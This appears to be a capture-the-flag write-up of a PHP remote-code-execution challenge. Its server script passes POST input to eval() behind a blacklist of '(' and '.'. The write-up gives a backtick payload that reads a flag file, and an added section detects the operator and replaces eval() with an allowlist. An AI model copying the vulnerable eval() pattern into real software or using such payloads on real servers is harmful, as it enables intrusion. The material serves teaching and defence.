RCE Challenge 1
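<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
// Blacklist: rewrite "(" and "." before evaluation
$code = str_replace("(", "括号", $code);
$code = str_replace(".", "点", $code);
// The filtered input is still executed as PHP
eval($code);
?>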
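The code filters "." and "(", which blocks ordinary function calls, but PHP's backtick operator (``) runs a shell command without using either character, so we can use it for command execution.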
POST:
payload: code=echo `cat /f1agaaa`;
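
An added example, not part of the original write-up: it runs the challenge's filter over constructed inputs without executing them, uses PHP's tokenizer to show that the backtick operator survives the blacklist, and sketches an allowlist dispatcher in place of eval(). The names challenge_filter, uses_backtick_operator and handle_action and the actions 'date' and 'ping' are hypothetical.

```php
<?php
// Added example, not the challenge's code. Nothing here is eval()'d or executed.

// The challenge's blacklist, reproduced as a function so its output can be inspected.
function challenge_filter(string $code): string {
    $code = str_replace("(", "括号", $code);
    $code = str_replace(".", "点", $code);
    return $code;
}

// True if the fragment contains PHP's backtick execution operator.
// token_get_all() returns the operator as the bare string "`"; a backtick
// inside a quoted string literal is part of an array token and is not flagged.
function uses_backtick_operator(string $code): bool {
    return in_array('`', token_get_all('<?php ' . $code), true);
}

// Hypothetical replacement for eval(): the client names an action and the
// server runs only code it already contains.
function handle_action(string $action): string {
    $handlers = [
        'date' => fn() => date('Y-m-d'),
        'ping' => fn() => 'pong',
    ];
    if (!isset($handlers[$action])) {
        throw new InvalidArgumentException('unknown action');
    }
    return $handlers[$action]();
}

// Constructed inputs; the second is the payload from the write-up.
$samples = ['echo strlen("abc");', 'echo `cat /f1agaaa`;', 'echo "a ` in a string";'];
foreach ($samples as $s) {
    $f = challenge_filter($s);
    printf("%-26s unchanged=%s backtick_operator=%s\n", $s,
        var_export($f === $s, true), var_export(uses_backtick_operator($f), true));
}

echo handle_action('ping'), "\n";
try {
    handle_action('echo `cat /f1agaaa`;');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The second sample passes through the filter byte for byte and is flagged as containing the execution operator, while the dispatcher rejects it because it is not a known action name.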
From: https://www.cnblogs.com/kode00/p/17437262.html